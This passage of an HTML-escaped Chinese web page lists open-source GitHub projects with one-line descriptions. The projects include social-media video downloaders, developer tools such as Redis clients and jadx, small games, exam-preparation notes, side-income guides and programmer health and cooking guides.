            &lt;a href=&quot;https://github.com/johnserf-seed/tiktokdownload&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tiktokdownload&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/johnserf-seed/tiktokdownload?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/johnserf-seed/tiktokdownload?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/johnserf-seed/tiktokdownload?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/johnserf-seed/tiktokdownload?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/johnserf-seed/tiktokdownload&quot; data-origin=&quot;https://img.shields.io/github/license/johnserf-seed/tiktokdownload&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/johnserf-seed/tiktokdownload&quot; data-origin=&quot;https://img.shields.io/github/last-commit/johnserf-seed/tiktokdownload&quot; alt=&quot;&quot;/&gt; - 抖音去水印批量下载用户主页作品、喜欢、收藏、图文、音频。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Johnserf-Seed/TikTokWeb&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;TikTokWeb&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/Johnserf-Seed/TikTokWeb?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/Johnserf-Seed/TikTokWeb?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/Johnserf-Seed/TikTokWeb?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/Johnserf-Seed/TikTokWeb?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/Johnserf-Seed/TikTokWeb&quot; data-origin=&quot;https://img.shields.io/github/license/Johnserf-Seed/TikTokWeb&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/Johnserf-Seed/TikTokWeb&quot; data-origin=&quot;https://img.shields.io/github/last-commit/Johnserf-Seed/TikTokWeb&quot; alt=&quot;&quot;/&gt; - 抖音去水印批量下载用户主页作品、喜欢、收藏、图文、音频。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/leiurayer/downkyi&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;downkyi&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/leiurayer/downkyi?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/leiurayer/downkyi?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/leiurayer/downkyi?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/leiurayer/downkyi?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/leiurayer/downkyi&quot; data-origin=&quot;https://img.shields.io/github/license/leiurayer/downkyi&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/leiurayer/downkyi&quot; data-origin=&quot;https://img.shields.io/github/last-commit/leiurayer/downkyi&quot; alt=&quot;&quot;/&gt; - 哔哩哔哩网站视频下载工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nilaoda/BBDown&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;BBDown&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/nilaoda/BBDown?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/nilaoda/BBDown?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/nilaoda/BBDown?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/nilaoda/BBDown?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/nilaoda/BBDown&quot; data-origin=&quot;https://img.shields.io/github/license/nilaoda/BBDown&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/nilaoda/BBDown&quot; data-origin=&quot;https://img.shields.io/github/last-commit/nilaoda/BBDown&quot; alt=&quot;&quot;/&gt; - &amp;nbsp;一款命令行式哔哩哔哩下载器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/qiye45/wechatVideoDownload&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;wechatVideoDownload&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/qiye45/wechatVideoDownload?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/qiye45/wechatVideoDownload?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/qiye45/wechatVideoDownload?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/qiye45/wechatVideoDownload?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/qiye45/wechatVideoDownload&quot; data-origin=&quot;https://img.shields.io/github/license/qiye45/wechatVideoDownload&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/qiye45/wechatVideoDownload&quot; data-origin=&quot;https://img.shields.io/github/last-commit/qiye45/wechatVideoDownload&quot; alt=&quot;&quot;/&gt; - 微信视频号下载工具，支持视频、直播回放下载。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/nilaoda/N_m3u8DL-CLI&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;N_m3u8DL-CLI&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/nilaoda/N_m3u8DL-CLI?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/nilaoda/N_m3u8DL-CLI?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/nilaoda/N_m3u8DL-CLI?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/nilaoda/N_m3u8DL-CLI?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/nilaoda/N_m3u8DL-CLI&quot; data-origin=&quot;https://img.shields.io/github/license/nilaoda/N_m3u8DL-CLI&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/nilaoda/N_m3u8DL-CLI&quot; data-origin=&quot;https://img.shields.io/github/last-commit/nilaoda/N_m3u8DL-CLI&quot; alt=&quot;&quot;/&gt; - 开源的命令行 &lt;code&gt;m3u8/HLS/dash&lt;/code&gt; 下载器。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/JoeanAmier/TikTokDownloader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;TikTokDownloader&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/JoeanAmier/TikTokDownloader?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/JoeanAmier/TikTokDownloader?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/JoeanAmier/TikTokDownloader?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/JoeanAmier/TikTokDownloader?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/JoeanAmier/TikTokDownloader&quot; data-origin=&quot;https://img.shields.io/github/license/JoeanAmier/TikTokDownloader&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/JoeanAmier/TikTokDownloader&quot; data-origin=&quot;https://img.shields.io/github/last-commit/JoeanAmier/TikTokDownloader&quot; alt=&quot;&quot;/&gt; - 抖音主页/视频/图集/收藏/直播/原声/合集/&lt;span style=&quot;text-decoration:line-through;&quot;&gt;评论&lt;/span&gt;/&lt;span style=&quot;text-decoration:line-through;&quot;&gt;账号&lt;/span&gt;/&lt;span style=&quot;text-decoration:line-through;&quot;&gt;搜索&lt;/span&gt;/热榜数据采集工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/JoeanAmier/XHS-Downloader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;XHS-Downloader&lt;/a&gt; &lt;img src=&quot;https://img.shields.io/github/stars/JoeanAmier/XHS-Downloader?style=social&quot; data-origin=&quot;https://img.shields.io/github/stars/JoeanAmier/XHS-Downloader?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/forks/JoeanAmier/XHS-Downloader?style=social&quot; data-origin=&quot;https://img.shields.io/github/forks/JoeanAmier/XHS-Downloader?style=social&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/license/JoeanAmier/XHS-Downloader&quot; data-origin=&quot;https://img.shields.io/github/license/JoeanAmier/XHS-Downloader&quot; alt=&quot;&quot;/&gt; &lt;img src=&quot;https://img.shields.io/github/last-commit/JoeanAmier/XHS-Downloader&quot; data-origin=&quot;https://img.shields.io/github/last-commit/JoeanAmier/XHS-Downloader&quot; alt=&quot;&quot;/&gt; - 小红书图文/视频作品数据采集工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/caorushizi/mediago&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;mediago&lt;/a&gt; - &lt;code&gt;m3u8&lt;/code&gt; 视频在线提取、流媒体下载、视频下载、&lt;code&gt;m3u8&lt;/code&gt; 视频下载、B站视频下载工具。&lt;a href=&quot;https://downloader.caorushizi.cn/guides.html?form=github&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/putyy/res-downloader&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;res-downloader&lt;/a&gt; - 视频号、小程序、抖音、快手、小红书、直播流、&lt;code&gt;m3u8&lt;/code&gt;、酷狗、&lt;code&gt;QQ&lt;/code&gt; 音乐等常见网络资源下载。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;开发工具项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%bc%80%e5%8f%91%e5%b7%a5%e5%85%b7%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;开发工具项目&quot;&gt;开发工具项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/qishibo/AnotherRedisDesktopManager&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;AnotherRedisDesktopManager&lt;/a&gt; - 一个更快、更好、更稳定的 &lt;code&gt;Redis&lt;/code&gt; 桌面管理器[ &lt;code&gt;GUI&lt;/code&gt; 客户端]，兼容 &lt;code&gt;Linux&lt;/code&gt;、&lt;code&gt;Windows&lt;/code&gt;、&lt;code&gt;Mac&lt;/code&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/tiny-craft/tiny-rdm&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;tiny-rdm&lt;/a&gt; - 一款现代化、轻量级的跨平台 &lt;code&gt;Redis&lt;/code&gt; 桌面客户端，可在 &lt;code&gt;Mac&lt;/code&gt;、&lt;code&gt;Windows&lt;/code&gt; 和 &lt;code&gt;Linux&lt;/code&gt; 系统上运行。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/RedisInsight/RedisInsight&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;RedisInsight&lt;/a&gt; - 最好用的 &lt;code&gt;Redis&lt;/code&gt; 可视化工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/vran-dev/PrettyZoo&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;PrettyZoo&lt;/a&gt; - 一个基于 &lt;code&gt;Apache Curator&lt;/code&gt; 和 &lt;code&gt;JavaFX&lt;/code&gt; 实现的 &lt;code&gt;Zookeeper&lt;/code&gt; 图形化管理客户端。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/skylot/jadx&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jadx&lt;/a&gt; - 一款功能强大的 &lt;code&gt;Java&lt;/code&gt; 反编译工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/veler/DevToys&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;DevToys&lt;/a&gt; - 一款离线的 Windows 应用程序，用于开发者的工具集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/gitbutlerapp/gitbutler&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gitbutler&lt;/a&gt; - &lt;code&gt;Git&lt;/code&gt; 分支管理工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wanghongenpin/network_proxy_flutter&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;network_proxy_flutter&lt;/a&gt; - 开源免费抓包工具，支持 &lt;code&gt;Windows&lt;/code&gt;、&lt;code&gt;Mac&lt;/code&gt;、&lt;code&gt;Android&lt;/code&gt;、&lt;code&gt;IOS&lt;/code&gt;、&lt;code&gt;Linux&lt;/code&gt; 全平台系统。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/acaudwell/Gource&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;Gource&lt;/a&gt; - 一个用于&lt;strong&gt;可视化软件版本控制历史的工具&lt;/strong&gt;。它能够生成令人印象深刻的演示视频，展示代码库的演化过程。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zu1k/nali&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;nali&lt;/a&gt; - 一个查询 &lt;code&gt;IP&lt;/code&gt; 地理信息和 &lt;code&gt;CDN&lt;/code&gt; 服务提供商的离线终端工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/any86/any-rule&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;any-rule&lt;/a&gt; - 常用正则大全, 支持 &lt;code&gt;web&lt;/code&gt; / &lt;code&gt;vscode&lt;/code&gt; / &lt;code&gt;idea&lt;/code&gt; / &lt;code&gt;Alfred Workflow&lt;/code&gt; 多平台。&lt;a href=&quot;https://any-rule.vercel.app/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/fatedier/frp&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;frp&lt;/a&gt; - 一个快速反向代理，可以将 &lt;code&gt;NAT&lt;/code&gt; 或防火墙后面的本地服务器暴露在互联网上。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/triggerdotdev/jsonhero-web&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;jsonhero-web&lt;/a&gt; - 一款开源、美观的 &lt;code&gt;Web JSON&lt;/code&gt; 浏览器，可以快速浏览、搜索和导航 &lt;code&gt;JSON&lt;/code&gt; 文件。&lt;a href=&quot;https://jsonhero.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/AlDanial/cloc&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cloc&lt;/a&gt; - 统计项目代码行数的工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/provectus/kafka-ui&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;kafka-ui&lt;/a&gt; - 开源的 &lt;code&gt;Kafka&lt;/code&gt; 管理平台。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/pcottle/learnGitBranching&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;learnGitBranching&lt;/a&gt; - 交互式 &lt;code&gt;Git&lt;/code&gt; 可视化和教程。&lt;a href=&quot;https://learngitbranching.js.org/?locale=zh_CN&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/go-gitea/gitea&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gitea&lt;/a&gt; - 一个极易安装，运行非常快速，安装和使用体验良好的自建 &lt;code&gt;Git&lt;/code&gt; 服务。&lt;a href=&quot;https://try.gitea.io/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt; &lt;a href=&quot;https://docs.gitea.com/zh-cn/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cfour-hi/gitstars&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;gitstars&lt;/a&gt; - &lt;code&gt;Github&lt;/code&gt; &lt;code&gt;Stars&lt;/code&gt; 存储库管理器，开发者必备的存储库管理工具。&lt;a href=&quot;https://gitstars.cfour.top/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/cars10/elasticvue&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;elasticvue&lt;/a&gt; - 一个免费且开源的 &lt;code&gt;Elasticsearch&lt;/code&gt; 图形用户界面。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hellodigua/code996&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;code996&lt;/a&gt; - 一个可以统计 &lt;code&gt;Git&lt;/code&gt; 项目的 &lt;code&gt;commit&lt;/code&gt; 时间分布工具。&lt;a href=&quot;https://hellodigua.github.io/code996/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xpipe-io/xpipe&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;xpipe&lt;/a&gt; - 一款好用的终端工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/TomWright/dasel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;dasel&lt;/a&gt; - 一款可以对 &lt;code&gt;JSON&lt;/code&gt;、&lt;code&gt;YAML&lt;/code&gt;、&lt;code&gt;CSV&lt;/code&gt; 等文件进行增删改查、转换等操作的工具。&lt;a href=&quot;https://daseldocs.tomwright.me/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/hanbingzi/anyclient-web&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;anyclient-web&lt;/a&gt; - 一款开源、支持 &lt;code&gt;Web&lt;/code&gt; 和客户端，能够连接各种类型数据服务的管理软件。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;游戏项目&quot;&gt;
    &lt;a href=&quot;?id=%e6%b8%b8%e6%88%8f%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;游戏项目&quot;&gt;游戏项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ratel-online/server&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;server&lt;/a&gt; - 多人命令行在线斗地主，德州扑克！&lt;a href=&quot;http://ratel.isnico.com/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ainilili/ratel&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;ratel&lt;/a&gt; - 基于 &lt;code&gt;Netty&lt;/code&gt; 实现的命令行斗地主游戏。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/wanghao221/moyu&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;moyu&lt;/a&gt; - 100个摸鱼小游戏、小工具源码集合。&lt;a href=&quot;https://game.haiyong.site/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线体验&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;计算机考研项目&quot;&gt;
    &lt;a href=&quot;?id=%e8%ae%a1%e7%ae%97%e6%9c%ba%e8%80%83%e7%a0%94%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;计算机考研项目&quot;&gt;计算机考研项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/ddy-ddy/cs-408&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cs-408&lt;/a&gt; - 计算机考研专业课程408相关的复习经验、资源和 &lt;code&gt;OneNote&lt;/code&gt; 笔记。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/xiaolei565/aimto408&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;aimto408&lt;/a&gt; - 计算机考研408。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/SSHeRun/CS-Xmind-Note&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;CS-Xmind-Note&lt;/a&gt; - 计算机专业课(408)思维导图和笔记。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/csseky/cskaoyan&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;cskaoyan&lt;/a&gt; - 计算机考研和软件工程考研专业的各个学校&lt;strong&gt;考研真题&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;考公项目&quot;&gt;
    &lt;a href=&quot;?id=%e8%80%83%e5%85%ac%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;考公项目&quot;&gt;考公项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/coder2gwy/coder2gwy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;coder2gwy&lt;/a&gt; - 互联网首份程序员考公指南。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/miss-mumu/developer2gwy&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;developer2gwy&lt;/a&gt; - 公务员从入门到上岸，最佳程序员公考实践教程。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;副业赚钱项目&quot;&gt;
    &lt;a href=&quot;?id=%e5%89%af%e4%b8%9a%e8%b5%9a%e9%92%b1%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;副业赚钱项目&quot;&gt;副业赚钱项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/easychen/howto-make-more-money&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;howto-make-more-money&lt;/a&gt; - 整理记录程序员如何优雅的&lt;strong&gt;挣零花钱&lt;/strong&gt;。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/bleedline/aimoneyhunter&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;aimoneyhunter&lt;/a&gt; - &lt;code&gt;AI&lt;/code&gt; 副业赚钱大集合。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/easychen/lean-side-bussiness&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;lean-side-bussiness&lt;/a&gt; - 程序员如何优雅地做副业。&lt;a href=&quot;https://r.ftqq.com/lean-side-bussiness/index.html&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/weijunext/indie-hacker-tools&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;indie-hacker-tools&lt;/a&gt; - 收录独立开发者出海技术栈和工具。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/1c7/chinese-independent-developer/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;chinese-independent-developer&lt;/a&gt; - 中国独立开发者项目列表。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/naxiaoduo/1000UserGuide&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;1000UserGuide&lt;/a&gt; - 整理了 300 多个国内外渠道，适合独立开发者和创业者推广产品的渠道。&lt;a href=&quot;https://1000userguide.com/#/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;程序员项目&quot;&gt;
    &lt;a href=&quot;?id=%e7%a8%8b%e5%ba%8f%e5%91%98%e9%a1%b9%e7%9b%ae&quot; data-id=&quot;程序员项目&quot;&gt;程序员项目&lt;/a&gt;
&lt;/h2&gt;
&lt;ul class=&quot; list-paddingleft-2&quot;&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/geekan/HowToLiveLonger&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;HowToLiveLonger&lt;/a&gt; - 程序员延寿指南。
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/Anduin2017/HowToCook&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;HowToCook&lt;/a&gt; - 程序员在家做饭方法指南。&lt;a href=&quot;https://cook.aiurs.co/&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;在线文档&lt;/a&gt;
        &lt;/p&gt;
    &lt;/li&gt;
    &lt;li&gt;
        &lt;p&gt;
            &lt;a href=&quot;https://github.com/zijie0/HumanSystemOptimization&quot; target=&quot;_blank&quot; rel=&quot;noopener noreferrer&quot;&gt;HumanSystemOptimization&lt;/a&gt; - 健康学习到150岁 - 人体系统调优不完全指南。
        &lt;/p&gt;
    &lt;/li&gt;
&lt;/ul&gt;
&lt;hr/&gt;
&lt;h2 id=&quot;合集项目&quot;&gt;
